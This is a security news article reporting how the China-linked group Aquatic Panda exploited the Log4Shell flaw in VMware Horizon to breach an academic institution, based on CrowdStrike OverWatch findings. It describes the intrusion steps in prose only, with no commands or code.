30 December 2021

China-based cyber spies breached an academic institution through Log4j flaw


China-based cyber spies breached an academic institution through Log4j flaw

China-linked cyber-espionage group known as Aquatic Panda has been recently spotted exploiting the Log4Shell vulnerability to break into a large academic institution.

According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of the Log4Shell exploit (initially published on GitHub on December 13) in order to gain access to the instance of VMware Horizon that employed the vulnerable Log4j library at an unnamed academic institution.

The purpose of the attack is unknown because the intrusion was thwarted.

“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.

The threat actor performed connectivity checks via DNS lookups for a subdomain executed under the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on a Windows host under the Apache Tomcat service to retrieve additional tools hosted on remote infrastructure.

Aquatic Panda performed reconnaissance from the host to better understand current privilege levels and system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.

The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting. The threat actor used winRAR to compress the memory dump in preparation for exfiltration and deleted all executables from the ProgramData and Windows\temp\ directories to cover their tracks.

“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.


Back to the list

Latest Posts

Free VPN apps on Google Play turned Android devices into residential proxies

Free VPN apps on Google Play turned Android devices into residential proxies

The threat actor behind this scheme profits by selling access to the residential proxy network to third parties.
28 March 2024
Cyber spies strike Indian government and energy sectors

Cyber spies strike Indian government and energy sectors

The operation involved phishing emails delivering the HackBrowserData info-stealer.
28 March 2024
Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

97 zero-day flaws were exploited in-the-wild in 2023, marking an increase of over 50% compared to 2022.
27 March 2024